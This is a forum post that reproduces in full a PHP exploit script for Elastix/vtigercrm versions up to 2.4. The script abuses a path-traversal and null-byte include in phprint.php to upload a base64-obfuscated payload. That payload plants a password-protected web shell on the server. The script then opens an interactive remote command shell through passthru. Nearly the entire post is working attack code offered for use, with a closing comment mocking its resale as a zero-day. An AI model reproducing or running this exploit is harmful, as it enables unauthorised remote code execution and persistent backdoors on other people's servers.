Jump to content
a.linm

Elastix < 2.5 , PHP code injection Exploit

Recommended Posts

<?

echo "n+-------------------------------------------+n";

echo "| Elastix <= 2.4 |n";

echo "| PHP Code Injection Exploit |n";

echo "| By i-Hmx |n";

echo "| sec4ever.com |n";

echo "| n0p1337@gmail.com |n";

echo "+-------------------------------------------+n";

echo "n| Enter Target [https://ip] # ";

$target=trim(fgets(STDIN));

$inj='<?eval(base64_decode("JGY9Zm9wZW4oJ2ZhcnNhd3kucGhwJywndysnKTskZGF0YT0nPD8gaWYoISRfUE9TVFtwd2RdKXtleGl0KCk7fSBlY2hvICJGYXJpcyBvbiB0aGUgbWljIDpEPGJyPi0tLS0tLS0tLS0tLS0tLS0tIjtAZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtmYV0pKTtlY2hvICItLS0tLS0tLS0tLS0tLS0tLSI7ID8+Jztmd3JpdGUoJGYsJGRhdGEpO2VjaG8gImRvbmUiOwo=")); ?>';

$faf=fopen("fa.txt","w+");

fwrite($faf,$inj);

fclose($faf);

$myf='fa.txt';

$url = $target."/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../modules/Import/ImportStep2.php%00"; // URL

$reffer = "http://1337s.cc/index.php";

$agent = "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)";

$cookie_file_path = "/";

echo "| Injecting 1st payloadn";

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_USERAGENT, $agent);

curl_setopt($ch, CURLOPT_POST, 1);

curl_setopt($ch, CURLOPT_POSTFIELDS,array("userfile"=>"@".realpath($myf)));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);

curl_setopt($ch, CURLOPT_REFERER, $reffer);

curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);

curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);

curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);

$result = curl_exec($ch);

curl_close($ch);

//echo $result;

echo "| Injecting 2nd payloadn";

function faget($url,$post){

$curl=curl_init();

curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);

curl_setopt($curl,CURLOPT_URL,$url);

curl_setopt($curl, CURLOPT_POSTFIELDS,$post);

curl_setopt($curl, CURLOPT_COOKIEFILE, '/');

curl_setopt($curl, CURLOPT_COOKIEJAR, '/');

curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);

curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);

curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);

curl_setopt($curl,CURLOPT_TIMEOUT,20);

curl_setopt($curl, CURLOPT_HEADER, true);

$exec=curl_exec($curl);

curl_close($curl);

return $exec;

}

function kastr($string, $start, $end){

$string = " ".$string;

$ini = strpos($string,$start);

if ($ini == 0) return "";

$ini += strlen($start);

$len = strpos($string,$end,$ini) - $ini;

return substr($string,$ini,$len);

}

$me=faget($target."/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../cache/import/IMPORT_%00","");

echo "| Testing total payloadn";

$total=faget($target."/vtigercrm/farsawy.php","pwd=1337");

if(!eregi("Faris on the mic :D",$total))

{

die("[+] Exploitation Failedn");

}

echo "| Sending CMD test packagen";

$cmd=faget($target."/vtigercrm/farsawy.php","pwd=1337&fa=cGFzc3RocnUoJ2VjaG8gZmFyc2F3eScpOw==");

if(!eregi("farsawy",$cmd))

{

echo " + Cmd couldn't executed but we can evaluate php coden + use : $target//vtigercrm/fa.phpn Post : fa=base64coden";

}

echo "| sec4ever shell online ;)nn";

$host=str_replace('https://','',$target);

while(1){

echo "i-Hmx@$host# ";

$c=trim(fgets(STDIN));

if($c=='exit'){die("[+] Terminatingn");}

$payload=base64_encode("passthru('$c');");

$fuck=faget($target."/vtigercrm/farsawy.php","pwd=1337&fa=$payload");

$done=kastr($fuck,"-----------------","-----------------");

echo "$donen";

}

/*

I dont even remember when i exploited this shit!

maybe on 2013?!

whatever , Hope its not sold as 0day in the near future xDD

*/

?>

https://cxsecurity.com/issue/WLB-2015090035

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...